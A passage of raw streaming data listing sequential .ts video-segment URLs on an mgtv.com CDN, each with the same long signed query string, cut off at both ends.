ws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/86030710F253729A64ED1BE37E460F49_400080_410080_1172_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/15795D700CC6D545EC45BD538A0E4B3B_410080_420080_701_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/40DC106AE04E6A38CA00B3CF50D858B2_420080_430080_639_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0C069030A9A6E356C595A8AF7503F86B_430080_440080_943_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C17912079CB02C659945AFD0BCA18E39_440080_450080_1087_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/18BD7516B401D7CC9FF6BB80E8077156_450080_460080_1312_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B7F1B6A5B2AE6878BF101936B266E41_460080_470080_1257_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E64B34D59269D35A38507BB07D75F047_470080_480080_843_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C5247FFB852A0F4711120B4CB5959A56_480080_490080_637_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/864FFD0BEF914E7293AE63BB89F26362_490080_500080_846_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6603DA575FD73F93D0BAFF18F818A4AA_500080_510080_655_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5E30A3C9B0201D4EECFC78326196886A_510080_520080_685_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D80B2FF9A0B25373B8D41AFFC795C3F6_520080_530080_1313_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B3CC7BB962D247DBAD6391CDF9034B12_530080_540080_778_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0EB2957DC3D1F071228DE95A48A07DD1_540080_550080_506_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/43B3714678E1359283BFF2AFDFC72194_550080_560080_700_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/41FE00BEADCA34C3245FFE668303C9C4_560080_570080_818_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2F09FBD2A988096852FFDE097120F471_570080_580080_1294_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3646981744F24F690E6D3C48C3FCC421_580080_590080_1744_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8EC7C7E3B083433D68E937F09D077442_590080_600080_935_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7BFDD41C40E3C64FDF002442CF2D3471_600080_610080_651_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F11B9A5B320441ABC9D68F49084F4CE0_610080_620080_1442_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZf